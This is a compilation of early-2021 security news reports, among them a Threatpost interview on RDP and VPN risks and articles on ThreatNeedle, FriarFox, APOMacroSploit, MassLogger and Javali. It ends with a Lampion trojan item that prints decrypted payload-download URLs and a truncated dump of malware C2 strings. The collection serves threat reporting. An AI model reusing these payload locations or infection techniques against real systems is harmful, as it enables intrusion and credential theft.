MH: So I think it’s mostly about, as you just said, about remote work and remote users, and how to target them or to benefit from the fact that they are that they are not necessarily behind their organization’s security or that there are more ways to connect remotely to a network. So it applies both to the employees but also sometimes to the threat actors. And of course, the fact that everything was happening so fast, necessarily means that at least in some organizations, there were holes in the security.
Remote Desktop Protocol as an Initial Attack Vector
So what we’ve been seeing
is more and more vulnerabilities and exploits for different VPN clients. That’s
one important thing. But also more and more attacks on RDP, remote desktop
protocol. And going back to ransomware, actually, in 2020, most of the
ransomware attacks did not even start with emails they started with exploitation
of RDP vulnerabilities. So it means the threat actors are indeed, understanding
that there’s a new attack, it’s not really a new attack vector, but one that is
more robust now and more vulnerable than in the past.
LW: Yeah, and that’s, that’s interesting, because I feel like RDP, that is something that is an attack vector that we’ve seen for a while now. So you know, given that, what are your top security practice recommendations for companies who are continuing to deal with the struggles of remote work, whether it is securing RDP or VPNs, or some of the other attack initial vectors you had mentioned there?
Best Cybersecurity Protection Practices for Enterprises
MH: Well, threat
vector threat actors exploit vulnerabilities in both technology and in people.
So I split my answer into one for the technology part which is making sure of
course to do security patches. And for the human being part, or the human error
part, is doing awareness, cyber security threatssecurity awareness to employees
is super important, and in many cases neglected. But of course, doing patches
and security awareness, we can’t really cover all the attack vectors this way.
It’s just impossible. And there are people who are dedicated to security
researchers, security companies like Check Point and others. And we make sure to
also understand this threat landscape and to cover it in our products. So it’s
also very important to also apply appropriate security solutions.
LW: Great, those are definitely important pieces of advice. So Maya, thank you so much for coming on to ThreatpostNOW to talk about some of the biggest stat cybercrime trends you’re seeing.
MH: Thank you Lindsey.
LW: Great. And that to all of our viewers, thank you again for tuning in to ThreatpostNOW. This is Lindsey Welch once again with Maya Horowitz with Check Point, and be sure to catch us on our next episode. Thank you.
North Korean Hackers Targeting Defense Firms with ThreatNeedle Malware
27.2.2021
Virus
Thehackernews
A prolific North
Korean state-sponsored hacking group has been tied to a new ongoing espionage
campaign aimed at exfiltrating sensitive information from organizations in the
defense industry.
Attributing the attacks with high confidence to the Lazarus Group, the new findings from Kaspersky signal an expansion of the APT actor's tactics by going beyond the usual gamut of financially-motivated crimes to fund the cash-strapped regime.
This broadening of its strategic interests happened in early 2020 by leveraging a tool called ThreatNeedle, researchers Vyacheslav Kopeytsev and Seongsu Park said in a Thursday write-up.
At a high level, the campaign leverages a multi-step approach that begins with a carefully crafted spear-phishing attack leading eventually to the attackers gaining remote control over the devices.
ThreatNeedle is delivered to targets via COVID-themed emails with malicious Microsoft Word attachments as initial infection vectors that, when opened, run a macro containing malicious code designed to download and execute additional payloads on the infected system.
The next-stage malware functions by embedding its malicious capabilities inside a Windows backdoor that offers features for initial reconnaissance and deploying malware for lateral movement and data exfiltration.
"Once installed, ThreatNeedle is able to obtain full control of the victim's device, meaning it can do everything from manipulating files to executing received commands," Kaspersky security researchers said.
Kaspersky found overlaps between ThreatNeedle and another malware family called Manuscrypt that has been used by Lazarus Group in previous hacking campaigns against the cryptocurrency and mobile games industries, besides uncovering connections with other Lazarus clusters such as AppleJeus, DeathNote, and Bookcode.
Interestingly, Manuscrypt was also deployed in a Lazarus Group operation last
month, which involved targeting the cybersecurity community with opportunities
to collaborate on vulnerability research, only to infect victims with malware
that could cause the theft of exploits developed by the researchers for possibly
undisclosed vulnerabilities, thereby using them to stage further attacks on
vulnerable targets of their choice.
Perhaps the most concerning of the development is a technique adopted by the attackers to bypass network segmentation protections in an unnamed enterprise network by "gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the intranet network to their remote server."
The cybersecurity firm said organizations in more than a dozen countries have been affected to date.
At least one of the spear-phishing emails referenced in the report is written in Russian, while another message came with a malicious file attachment named "Boeing_AERO_GS.docx," possibly implying a U.S. target.
Earlier this month, three North Korean hackers associated with the military intelligence division of North Korea were indicted by the U.S. Justice Department for allegedly taking part in a criminal conspiracy that attempted to extort $1.3 billion in cryptocurrency and cash from banks and other organizations around the world.
"In recent years, the Lazarus group has focused on attacking financial institutions around the world," the researchers concluded. "However, beginning in early 2020, they focused on aggressively attacking the defense industry."
"While Lazarus has also previously utilized the ThreatNeedle malware used in this attack when targeting cryptocurrency businesses, it is currently being actively used in cyberespionage attacks."
ALERT: Malicious Amazon Alexa Skills Can Easily Bypass Vetting Process
27.2.2021
Virus
Thehackernews
Researchers have uncovered gaps in Amazon's skill vetting process for the Alexa voice assistant ecosystem that could allow a malicious actor to publish a deceptive skill under any arbitrary developer name and even make backend code changes after approval to trick users into giving up sensitive information.
The findings were presented on Wednesday at the Network and Distributed System Security Symposium (NDSS) conference by a group of academics from Ruhr-Universität Bochum and the North Carolina State University, who analyzed 90,194 skills available in seven countries, including the US, the UK, Australia, Canada, Germany, Japan, and France.
Amazon Alexa allows third-party developers to create additional functionality for devices such as Echo smart speakers by configuring "skills" that run on top of the voice assistant, thereby making it easy for users to initiate a conversation with the skill and complete a specific task.
Chief among the findings is the concern that a user can activate a wrong skill, which can have severe consequences if the skill that's triggered is designed with insidious intent.
The pitfall stems from the fact that multiple skills can have the same invocation phrase.
Indeed, the practice is so prevalent that the investigation spotted 9,948 skills that share the same invocation name with at least one other skill in the US store alone. Across all the seven skill stores, only 36,055 skills had a unique invocation name.
Given that the actual criteria Amazon uses to auto-enable a specific skill among
several skills with the same invocation names remain unknown, the researchers
cautioned it's possible to activate the wrong skill and that an adversary can
get away with publishing skills using well-known company names.
"This primarily happens because Amazon currently does not employ any automated approach to detect infringements for the use of third-party trademarks, and depends on manual vetting to catch such malevolent attempts which are prone to human error," the researchers explained. "As a result users might become exposed to phishing attacks launched by an attacker."
Even worse, an attacker can make code changes following a skill's approval to coax a user into revealing sensitive information like phone numbers and addresses by triggering a dormant intent.
In a way, this is analogous to a technique called versioning that's used to bypass verification defences. Versioning refers to submitting a benign version of an app to the Android or iOS app store to build trust among users, only to replace the codebase over time with additional malicious functionality through updates at a later date.
To test this out, the researchers built a trip planner skill that allows a user to create a trip itinerary that was subsequently tweaked after initial vetting to "inquire the user for his/her phone number so that the skill could directly text (SMS) the trip itinerary," thus deceiving the individual into revealing his (or her) personal information.
Furthermore, the study found that the permission model Amazon uses to protect
sensitive Alexa data can be circumvented. This means that an attacker can
directly request data (e.g., phone numbers, Amazon Pay details, etc.) from the
user that are originally designed to be cordoned by permission APIs.
The idea is that while skills requesting for sensitive data must invoke the permission APIs, it doesn't stop a rogue developer from asking for that information straight from the user.
The researchers said they identified 358 such skills capable of requesting information that should be ideally secured by the API.
Lastly, in an analysis of privacy policies across different categories, it was
found that only 24.2% of all skills provide a privacy policy link, and that
around 23.3% of such skills do not fully disclose the data types associated with
the permissions requested.
Noting that Amazon does not mandate a privacy policy for skills targeting children under the age of 13, the study raised concerns about the lack of widely available privacy policies in the "kids" and "health and fitness" categories.
"As privacy advocates we feel both 'kid' and 'health' related skills should be held to higher standards with respect to data privacy," the researchers said, while urging Amazon to validate developers and perform recurring backend checks to mitigate such risks.
"While such applications ease users' interaction with smart devices and bolster a number of additional services, they also raise security and privacy concerns due to the personal setting they operate in," they added.
Malicious Mozilla Firefox Extension Allows Gmail Takeover
26.2.2021
Virus
Threatpost
The malicious extension, FriarFox, snoops in on both Firefox and Gmail-related data.
A newly uncovered cyberattack is taking control of victims’ Gmail accounts, by using a customized, malicious Mozilla Firefox browser extension called FriarFox.
Researchers say the threat campaign, observed in January and February, targeted Tibetan organizations and was tied to TA413, a known advanced persistent threat (APT) group that researchers believe to be aligned with the Chinese state.
The group behind this attack aims to gather information on victims by snooping in on their Firefox browser data and Gmail messages, said researchers.
After installation, FriarFox gives cybercriminals various types of access to users’ Gmail accounts and Firefox browser data.
For instance, cybercriminals have the ability to search, read, label, delete, forward and archive emails, receive Gmail notifications and send mail from the compromised account. And, given their Firefox browser access, they could access user data for all websites, display notifications, read and modify privacy settings, and access browser tabs.
“The introduction of the FriarFox browser extension in TA413’s arsenal further diversifies a varied, albeit technically limited repertoire of tooling,” said Proofpoint on Thursday. “The use of browser extensions to target the private Gmail accounts of users, combined with the delivery of Scanbox malware, demonstrates the malleability of TA413 when targeting dissident communities.”
The Cyberattack: Stemming From Malicious Emails
The attack stemmed from
phishing emails (first detected in late January), targeting several Tibetan
organizations. One of the emails uncovered by researchers purported to be from
the “Tibetan Women’s Association,” which is a legitimate group based in India.
The subject of the email was: “Inside Tibet and from the Tibetan exile
community.”
Researchers noted that the emails were delivered from a known TA413 Gmail account, which has been in use for several years. The email impersonates the Bureau of His Holiness the Dalai Lama in India, said researchers.
The email contained a malicious URL, which impersonated a YouTube page (hxxps://you-tube[.]tv/). In reality, this link took recipients to a fake Adobe Flash Player update-themed landing page, where the process of downloading the malicious browser extension begins.
Fake Adobe Flash Player Page and FriarFox Download
The malicious “update”
page then executes several JavaScript files, which profile the user’s system and
determine whether or not to deliver the malicious FriarFox extension; the
installation of FriarFox depends on several conditions.
“Threat actors appear to be targeting users that are utilizing a Firefox Browser and are utilizing Gmail in that browser,” the researchers said. “The user must access the URL from a Firefox browser to receive the browser extension. Additionally, it appeared that the user must be actively logged in to a Gmail account with that browser to successfully install the malicious XPI [FriarFox] file.”
Firefox users with an active Gmail session are immediately served the FriarFox extension (from hxxps://you-tube[.]tv/download.php) with a prompt that enables the download of software from the site.
Friarfox malicious firefox browser extension
Campaign landing page. Credit:
Proofpoint
They are prompted to add the browser extension (by approving the extension’s permissions), which claims to be “Flash update components.”
But the threat actors also utilize various tricks against users who are either not using a Firefox browser and/or who do not have an active Gmail session.
For instance, one user who did not have an active Gmail session and wasn’t using Firefox was redirected to the legitimate YouTube login page, after visiting the fake Adobe Flash Player landing page. The attackers then attempted to access an active domain cookie in use on the site.
In this situation, “actors may be attempting to leverage this domain cookie to access the user’s Gmail account in the instance that a GSuite federated login session is used to log in to the user’s YouTube account,” said researchers. However, “this user is not served the FriarFox browser extension.”
FriarFox Browser Extension: Malicious Capabilities
Researchers said that
FriarFox appears to be based on an open-source tool called “Gmail Notifier
(restartless).” This is a free tool that’s available from various locations,
including GitHub, the Mozilla Firefox Browser Add-Ons store and the QQ App
store. The malicious extension also comes in the form of an XPI file, noted
researchers – these files are compressed installation archives used by various
Mozilla applications, and contain the contents of a Firefox browser extension.
Friarfox malicious firefox browser extension
The FriarFox attack vector.
Credit: Proofpoint
“TA413 threat actors altered several sections of the open-source browser extension Gmail Notifier to enhance its malicious functionality, conceal browser alerts to victims and disguise the extension as an Adobe Flash-related tool,” said researchers.
After FriarFox is installed, one of the Javascript files (tabletView.js) also contacts an actor-controlled server to retrieve the Scanbox framework. Scanbox is a PHP and JavaScript-based reconnaissance framework that can collect information about victim systems, which dates to 2014.
TA413 Threat Group: Continually Evolving
TA413 has been associated with
Chinese state interests and is known for targeting the Tibetan community. As
recently as September, the China-based APT was sending organizations
spear-phishing emails that distribute a never-before-seen
intelligence-collecting RAT dubbed Sepulcher.
“While not conventionally sophisticated when compared to other active APT groups, TA413 combines modified open-source tools, dated shared reconnaissance frameworks, a variety of delivery vectors and very targeted social-engineering tactics,” said researchers.
Researchers said this latest campaign shows that TA413 appears to be pivoting to using more modified open-source tooling to compromise victims.
“Unlike many APT groups, the public disclosure of campaigns, tools and infrastructure has not led to significant TA413 operational changes,” they said. “Accordingly, we anticipate continued use of a similar modus operandi targeting members of the Tibetan diaspora in the future.”
Researchers uncovered a new Malware Builder dubbed APOMacroSploit
22.2.2021
Virus
Securityaffairs
Researchers spotted a new Office malware builder, tracked as APOMacroSploit,
that was employed in a campaign targeting more than 80 customers worldwide.
Researchers from security firm Check Point uncovered a new Office malware
builder called APOMacroSploit, which was employed in attacks that targeted more
than 80 customers worldwide.
APOMacroSploit is a macro builder that was to create weaponized Excel documents
used in multiple phishing attacks. The threat actor behind the tool continuously
updated it to evade detection. Check Point researchers were able to unmask one
of the threat actors behind the builder.
Excel documents created with the
APOMacroSploit builder are capable of bypassing antivirus software, Windows
Antimalware Scan Interface (AMSI), and even Gmail and other email-based phishing
detection.
“The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script.” reads the analysis published by the researchers.
“Based on the number of customers and the lowest option price for this product,
we estimate that the two main threat actors made at least $5000 in 1.5 months,
just by selling the APOMacroSploit product.”
Experts believe APOMacroSploit
was created by two French-based threat actors “Apocaliptique” and “Nitrix” who
were selling the product on HackForums.net.
About 40 hackers took part in the campaign that the researchers in November uncovered, they used 100 different email senders targeting users in more than 30 different countries.
“The initial malicious document our customer received was an XLS file containing an obfuscated XLM macro called Macro 4.0. The macro is triggered automatically when the victim opens the document, and downloads a BAT file from cutt.ly.” continues the analysis. “The execution of the command “attrib” enables the BAT script to hide in the victim’s machine. We assume the reordering of the PowerShell instructions via the Start-Sleep command (visible after deobfuscation) is seen by the attacker as another static evasion.”
The researchers noticed that the attackers made a mistake, The cutt[.]ly domain directly redirects to a download server and does not perform the request on the back end. The servers host the BAT files, for each file, the nickname of the customer was inserted inside of the filename.
The BAT script downloads the fola.exe malware for one of the following Windows versions;
Windows 10
Windows 8.1
Windows 8
Windows 7
In order to avoid
detection, the BAT scripts add the malware location in the exclusion path of
Windows Defender and disabling Windows cleanup before executing the malware.
In at least one attack, the threat actors used a Delphi Crypter along with a
second-stage malware, a remote access Trojan dubbed BitRAT.
BitRAT implements multiple features, including mining cryptocurrencies and RAT features. A Notepad.exe injected shellcode drops a VBS file in the startup folder to ensure persistency.
The researchers were able to unmask the real identity of Nitrix, because he revealed his actual name in a post on Twitter containing a picture of a ticket he bought for a concert in December 2014.
Check Point Research shared their findings with law enforcement and provided in the report Indicators of Compromise (IoCs) for this campaign.
Experts warn of threat actors abusing Google Alerts to deliver unwanted programs
22.2.2021
Virus
Securityaffairs
Experts warn of threat actors using Google Alerts to promote a fake Adobe Flash
Player updater that delivers unwanted programs.
Experts from BleepingComputer
are warning of threat actors that are using Google Alerts to promote a fake
Adobe Flash Player updater that delivers unwanted programs. Bad actors publish
posts with titles containing popular keywords to allow Google Search to index
the content.
Google Alerts is a content change detection and notification service, it sends
emails to the user when it finds new results (i.e. web pages, newspaper
articles, blogs, or scientific research) that match the user’s search term(s).
Upon indexing the content, Google Alerts will alert people who are searching
those specific terms.
Clicking on the links sent by Google Alerts related to the matches in the fake stories, users are redirected to malicious sites under the control of the threat actors the threat actor’s malicious site.
However, experts pointed out that visiting the URL of the fake stories directly, the website will state that the page does not exist.
Bleeping computer experts observed multiple campaigns abusing the Google notification service.
“This weekend, BleepingComputer observed the fake news stories redirecting to a new campaign that states your Flash Player is outdated and then prompts you to install an updater.” states BleepingComputer.
Source BleepingComputer
Once Clicked the ‘Update’ button, the victim will
download a setup.msi file that installs a potentially unwanted program called
‘One Updater.’
Even if “One Updater” is not a malware, we cannot exclude that this technique could be used by threat actors to deliver and execute malicious payloads in future attacks.
New Masslogger Trojan variant exfiltrates user credentials
20.2.2021
Virus
Securityaffairs
MassLogger Windows credential stealer infamous is back and it has been upgraded
to steal credentials from Outlook, Chrome, and instant messenger apps.
MassLogger Windows credential stealer is back and it has been upgraded to steal
credentials from Outlook, Chrome, and instant messenger apps.
Cisco Talos experts uncovered attacks against users in Turkey, Latvia, and Italy, the infections have some similarities with attacks that targeted users in Bulgaria, Lithuania, Hungary, Estonia, Romania, and Spain in September, October, and November 2020.
The MassLogger infections were first spotted in the wild in April, since then
the author of the malware are improving the malicious code.
Unlike other
Masslogger trojan samples previously documented, the one employed in the new
campaign uses the Microsoft Compiled HTML Help file format, which is a Microsoft
proprietary online help format, to start the infection chain. The Microsoft file
format can also contain active script components, in this case JavaScript, which
is used to launch the malware in the attacks detected by Talos.
“Although operations of the Masslogger trojan have been previously documented, we found the new campaign notable for using the compiled HTML file format to start the infection chain.” reads the analysis published by Cisco Talos. “This file format is typically used for Windows Help files, but it can also contain active script components, in this case JavaScript, which launches the malware’s processes.”
The infection chain starts with an email message containing a legitimate-looking subject line and comes with a RAR attachment with a slightly unusual filename extension.
RAR archives can also be split into multi-volume archives, in the attacks observed by Talos, the filename creates files with the RAR extension named “r00” and later with the .chm file extension. This trick was implemented to bypass security programs that check for the file extension of the attachment.
Upon opening the attachments, the message “Customer service” is displayed while
an obfuscated JavaScript code creates an HTML page, which in turn contains a
PowerShell downloader that fetches from a legitimate server the loader used to
launch the MassLogger payload.
The malware is able to exfiltrate stolen data via SMTP, FTP or HTTP. The latest version of MassLogger (version 3.0.7563.31381) implements features to steal credentials from Pidgin messenger client, Discord, NordVPN, Outlook, Thunderbird, Firefox, QQ Browser, and Chromium-based browsers such as Chrome, Edge, Opera, and Brave.
The Masslogger Trojan could also act as a keylogger, but the variant analyzed by the experts has disabled this functionality.
The malware is almost entirely executed in memory, for this reason in order to detect the threat it is important to conduct continuous background memory scans. The malware only leaves the attachment and the compiled HTML help file on the disk of the infected machine.
“Users are advised to configure their systems for logging PowerShell events such as module loading and executed script blocks as they will show executed code in its deobfuscated format. Talos will continue to track similar campaigns to make sure adequate protection is included in Cisco Secure products.” concludes the report.
Masslogger Trojan Upgraded to Steal All Your Outlook, Chrome Credentials
20.2.2021
Virus
Thehackernews
A credential stealer infamous for targeting Windows systems has resurfaced in a
new phishing campaign that aims to steal credentials from Microsoft Outlook,
Google Chrome, and instant messenger apps.
Primarily directed against users in Turkey, Latvia, and Italy starting mid-January, the attacks involve the use of MassLogger — a .NET-based malware with capabilities to hinder static analysis — building on similar campaigns undertaken by the same actor against users in Bulgaria, Lithuania, Hungary, Estonia, Romania, and Spain in September, October, and November 2020.
MassLogger was first spotted in the wild last April, but the presence of a new
variant implies malware authors are constantly retooling their arsenal to evade
detection and monetize them.
"Although operations of the Masslogger trojan
have been previously documented, we found the new campaign notable for using the
compiled HTML file format to start the infection chain," researchers with Cisco
Talos said on Wednesday.
Compiled HTML (or .CHM) is a proprietary online help format developed by
Microsoft that's used to provide topic-based reference information.
The new wave of attacks commences with phishing messages containing "legitimate-looking" subject lines that appear to relate to a business.
One of the emails targeted at Turkish users had the subject "Domestic customer inquiry," with the body of the message referencing an attached quote. In September, October and November, the emails took the form of a "memorandum of understanding," urging the recipient to sign the document.
Regardless of the message theme, the attachments adhere to the same format: a
RAR multi-volume filename extension (e.g., "70727_YK90054_Teknik_Cizimler.R09")
in a bid to bypass attempts to block RAR attachments using its default filename
extension ".RAR."
These attachments contain a single compiled HTML file that, when opened, displays the message "Customer service," but in fact comes embedded with obfuscated JavaScript code to create an HTML page, which in turn contains a PowerShell downloader to connect to a legitimate server and fetch the loader ultimately responsible for launching the MassLogger payload.
Aside from exfiltrating the amassed data via SMTP, FTP or HTTP, the latest version of MassLogger (version 3.0.7563.31381) features functionality to pilfer credentials from Pidgin messenger client, Discord, NordVPN, Outlook, Thunderbird, Firefox, QQ Browser, and Chromium-based browsers such as Chrome, Edge, Opera, and Brave.
"Masslogger can be configured as a keylogger, but in this case, the actor has disabled this functionality," the researchers noted, adding the threat actor installed a version of Masslogger control panel on the exfiltration server.
With the campaign almost entirely executed and present only in memory with the sole exception of the compiled HTML help file, the significance of conducting regular memory scans cannot be overstated enough.
"Users are advised to configure their systems for logging PowerShell events such as module loading and executed script blocks as they will show executed code in its deobfuscated format," the researchers concluded.
Masslogger Swipes Microsoft Outlook, Google Chrome Credentials
18.2.2021 Virus Threatpost
A new version of the Masslogger trojan has been targeting Windows users – now using a compiled HTML (CHM) file format to start the infection chain.
Cybercriminals are targeting Windows users with a new variant of the Masslogger trojan, which is spyware designed to swipe victims’ credentials from Microsoft Outlook, Google Chrome and various instant-messenger accounts.
Researchers uncovered the campaign targeting users in Italy, Latvia and Turkey starting in mid-January. When the Masslogger variant launched its infection chain, it disguised its malicious RAR files as Compiled HTML (CHM) files. This is a new move for Masslogger, and helps the malware sidestep potential defensive programs, which would otherwise block the email attachment based on its RAR file extension, said researchers on Wednesday.
“The use of compiled HTML (usually used for Windows help files) can be advantageous for the attacker since the initial infection vector is email,” Vanja Svajcer, outreach researcher with Cisco Talos, told Threatpost. “Many organizations will not consider CHM files to be executables so it is more likely they will evade content filters filtering incoming email messages based on the attachment name or type.”
Masslogger is a spyware program, which is written in .NET and steals browser, email and instant-messaging credentials. The trojan was released in April and has since been sold on underground forums.
“Masslogger is a commodity malware that has been in development and circulation for almost a year now,” Svajcer told Threatpost. “It is sold on underground forums for relatively modest amount of money and it can be used by any malicious actor. We wanted to emphasize that these campaigns with these particular spreading techniques can likely be linked to a single actor, based on the exfiltration server domain used in all campaign for exfiltrating credentials.”
masslogger malware campaign
An example of a spear-phishing email targeting
victims in Turkey. Credit: Cisco Talos
Researchers said the recent attack kicked off with email messages that contained “legitimate-looking” subject lines related to business. One email, for example, was entitled “Domestic customer inquiry” and told the recipient, “At the request of our customer, please send your attached best quotes.”
These emails contained RAR attachments – however, of note, while the typical filename extensions for RAR files is .rar, the attackers hid them in this case with the .chm file extension. The files were named with the pattern “r00,” with the numbers growing per file in each email.
The Compiled HTML (CHM) file format is used for help documentation — the files are compiled and saved in a compressed HTML format. They may include text, images and hyperlinks. CHM files are used by Windows programs as an online help solution.
This attachment filename extension is sometimes chosen to bypass “simple
blockers,” which attempt to block RAR attachments using its default filename
extension “.rar,” said Svajcer. WinRAR and other RAR-capable unarchivers will
still open CHM files without problems, he noted.
The Masslogger infection chain. Credit: Cisco Talos
In this case, the attached files contain an embedded HTML file with “light-obfuscated” JavaScript code, which, once opened, starts the active infection process.
After the active infection process starts, a PowerShell script executes, which eventually de-obfuscates into a downloader . This then downloads and loads the main PowerShell loader.
“The main payload is a variant of the Masslogger trojan designed to retrieve and exfiltrate user credentials from a variety of sources, targeting home and business users,” said Svajcer. “Masslogger can be configured as a keylogger, but in this case, the actor has disabled this functionality.”
Microsoft Outlook, Google Chrome Credentials Under Attack
The Masslogger
payload contains the functionality to target and steal credentials from the
following applications: Pidgin (a free and open-source multi-platform instant
messenger client), the FileZilla File Transfer Protocol (FTP) client, the
Discord group-chatting platform, NordVPN, Outlook, FoxMail, Firefox,
Thunderbird, QQ Browser and Chromium-based browsers (Chrome, Chromium, Edge,
Opera and Brave).
“Once the credentials from targeted applications are retrieved, they are uploaded to the exfiltration server with a filename containing the username, two-letter country ID, unique machine ID and the timestamp for when the file was created,” said Svajcer.
Masslogger Malware Continues to Evolve
Locations targeted by Masslogger. Credit: Cisco Talos
Researchers believe that the actor behind the campaign is tied to other attacks, which date back to at least September. These campaigns have targeted several European countries and shift their focus monthly. For instance, researchers detected email messages targeting Bulgaria, Estonia, Hungary, Italy, Latvia, Lithuania, Romania, Spain and Turkey, as well as messages written in English.
Based on the indicators of compromise (IoCs) that researchers retrieved, they said that they have “moderate confidence” that this attacker has previously used other payloads such as the AgentTesla trojan and the Formbook dropper in campaigns starting as early as April.
“The actor employs a multi-modular approach that starts with the initial phishing email and carries through to the final payload,” said Svajcer. “The adversaries behind this campaign likely do this to evade detection. But it can also be a weakness, as there are plenty of opportunities for defenders to break the kill chain.”
Researchers Unmask Hackers Behind APOMacroSploit Malware Builder
18.2.2021
Virus
Thehackernews
Cybersecurity researchers have disclosed a new kind of Office malware distributed as part of a malicious email campaign that targeted more than 80 customers worldwide in an attempt to control victim machines and steal information remotely.
The tool — dubbed "APOMacroSploit" — is a macro exploit generator that allows the user to create an Excel document capable of bypassing antivirus software, Windows Antimalware Scan Interface (AMSI), and even Gmail and other email-based phishing detection.
APOMacroSploit is believed to be the work of two French-based threat actors
"Apocaliptique" and "Nitrix," who are estimated to have made at least $5000 in
less than two months selling the product on HackForums.net.
About 40 hackers
in total are said to be behind the operation, utilizing 100 different email
senders in a slew of attacks targeting users in more than 30 different
countries. The attacks were spotted for the first time at the end of November
2020, according to cybersecurity firm Check Point.
"The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script," the firm said in a Tuesday report.
This system command script is retrieved from cutt.ly, which directs to servers hosting multiple BAT scripts that have the nickname of the customers attached to the filenames. The scripts are also responsible for executing the malware ("fola.exe") on Windows systems, but not before adding the malware location in the exclusion path of Windows Defender and disabling Windows cleanup.
In one of the attacks, the malware — a Delphi Crypter followed by a second-stage
remote access Trojan called BitRAT — was found hosted on a Bulgarian website
catering to medical equipment and supplies, implying that the attackers breached
the website to store the malicious executable.
The idea of using "crypters" or "packers" has become increasingly popular among threat actors to not only compress but also to make malware samples more evasive and reverse engineer.
BitRAT, which was formally documented last August, comes with features to mine
cryptocurrencies, hack webcams, log keystrokes, download and upload arbitrary
files, and remotely control the system via a command-and-control server, which
in this case resolved to a sub-domain of a legitimate Bulgarian website for
video surveillance systems.
Further investigation by Check Point involved chasing the digital trail left by the two operators — including two League of Legends player profiles — ultimately leading the researchers to unmask the real identity of Nitrix, who revealed his actual name on Twitter when he posted a picture of a ticket he bought for a concert in December 2014.
While Nitrix is a software developer from Noisy-Le-Grand with four years of experience as a software developer, Apocaliptique's use of alternative names such as "apo93" or "apocaliptique93" has stirred up possibilities that the individual may also be a French resident, as "93" is the colloquial name for the French department of Seine-Saint-Denis.
Check Point Research said it has alerted law enforcement authorities about the identities of the attackers.
Latin American Javali trojan weaponizing Avira antivirus legitimate injector to
implant malware
17.2.2021
Virus
Securityaffairs
Latin American Javali trojan weaponizing Avira antivirus legitimate injector to
implant malware
In the last few years, many banking trojans developed by
Latin American criminals have increased in volume and sophistication. Although
exists a strong adoption of technologies with the goal of protecting the final
user such as plugins, tokens, e-tokens, two-factor-authentication mechanisms,
CHIP, PIN cards, and so on, online fraud is still on the rise and every day
implementing new tactics, techniques, and procedures (TTP) to evade antivirus
and Endpoint Detection & Response systems.
In this article, we will into the details of the Javali trojan banker, introduced and tracked by the Kaspersky Team, and targeting Latin American countries, including Brazil and Mexico banking and financial organizations.
Background of Latin American Trojans
Javali trojan is active since November
2017 and targets users of financial and banking organizations geolocated in
Brazil and Mexico. By analyzing this piece of malware, we found that Javali is
using the same routines and calls often observed on other Latin American
trojans, such as Grandoreiro, URSA aka Mispadu, Lampion, Vadokrist, Amavaldo,
Casbaneiro aka Metamorpho and Mekotio.
Figure 1: The most popular and dangerous Latin American trojans.
In short, part of these trojan families are using padding to enlarge the binary; empty sections or even BPM images attached as a resource as described in this article related to the Grandoreiro trojan. Other trojans use this technique as it allows to evade detection and execute the malicious code on the target machines bypassing detection based on static file signatures.
Latin American trojans share the same modus operandi and even modules and blocks
of code observed during the analysis of several malware samples. The following
schema is an effort to present in a single high-level diagram the workflow of
the most popular Latin American trojans.
Figure 2: High-level diagram of the modus operandi of the most popular Latin American banking trojans.
The malicious activity starts with a phishing email sent to the target victims in Latin American – Brazil, Mexico, Chile, and Peru – and Europe – Spain and Portugal. The initial stage of these trojans is generally the execution of a dropper in a form of a VBS, JScript, or MSI file that downloads from the Cloud (AWS, Google, etc.) the trojan loader/injector. After this step, the trojan itself – developed in Delphi – is executed into the memory manly using the DLL side loading technique or DLL injection, creating persistence using a .lnk file on the Windows Startup folder, or adding a new key in the machine registry (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run) with the name and path of the .lnk file to guarantee the malware is executed every time the infected machine starts.
The steps 7 and 8 from Figure 2, the malware obtains some details from the infected machine and report them to the C2 server, including the version of the Operating System (OS), architecture, the name of the installed antivirus and EDRs, computer name, and the victim’s geolocation.
From here, the malware executes a new thread when specific and hardcoded web-browsers are opened. The title of the accessed web-pages are collected and compared with the target organizations and services hardcoded and defined by crooks, generally the name of the banking portals, cryptocurrency portals, and financial firms. If these conditions match, the windows overlay process starts launching fake windows to lure victims.
More details and comparisons between several threads and used TTPs can be found
below and by accessing the publication from ESET.
Figure 3: MITRE ATT&CK table illustrating the features that Latin American banking trojans share (full table and more details here).
As observed during the last few years, several threats share a lot of TTP and code, and that is a clear signal of cooperation between malicious groups.
Discovering Javali trojan banker
These days, the Javali trojan banker is one
of the most popular trojan banker families in the wild. According to the
Kaspersky publication:
Javali targets Portuguese- and Spanish-speaking countries, active since November 2017 and primarily focusing on the customers of financial institutions located in Brazil and Mexico
Lampion trojan disseminated in Portugal using COVID-19 template
13.2.2021
Virus
Securityaffairs
The fresh release of the Latin American Lampion trojan was updated with a new C2
address. Lampion trojan disseminated in Portugal using COVID-19 template.
In
the last few days, a new release of the Latin American Lampion trojan was
released in Portugal using a template related to COVID-19. This trojan has been
distributed in Portugal in different ways, but this time the pandemic situation
and the ongoing vaccination process is the reason behind this campaign to drop
the beast in the wild.
In detail, the threat is impersonating the domain “min-saude.pt” and the link to the zip file is also distributed in the email body.
Comuinicado-Covid19-Min-Saude-VRC-03–02-21-210.zip
The modus operandi is the same as observed in previous releases, only the addresses of the DLLs used during the side-loading process and C2 server geolocalized in Russia have been changed.
DLLs used during the DLL side-loading process downloaded from Google storage
encrypted_string="n\s^[j]jef9ig0`%Y%|ipjweWh+WM]2[W$}]MeRee]8bc[{W<f6_$iH$iYLe]c|%=cUoOi6j@e;h/W*]M[o(g&c(_'P%=FZ#R(I#1'8/'$dZtb^bOg"
decrypted_string="hxxps://storage.googleapis.]com/mystorage2021/P-2-19.dll"
encrypted_string="iP/^*j6jvfpiV0O%A%*i;j+eLh(W\]K[N$0];e.ep]&br[gW+f/_)ik$+Y&excs%=cJo2i2jIe,h4W2]I[D(|&V(R'S%;&L$bpo_>fq5"
decrypted_string="hxxps://storage.googleapis.]com/mystorage2021/0.zip"
When
the malware is executed, it communicates with the C2 server and the browser
overlay process begins every time a target home banking portal is accessed on
the victim side.
0x4e7e210 (22): <|AppClip|><br />0x4e7e344 (38): Server Mandou====> <br
/>0x4e7e37c (36): <|FECHAR_RECORTE|><br />0x4e7e3b0 (72): Server manda====>
Fecahando Recorte!<br />0x4e7e408 (30): <|ALINHA_TELA|><br />0x4e7e434 (34):
ServRecebeu====> <br />0x4e7e474 (8): ><|><br />0x4e7e4b4 (40):
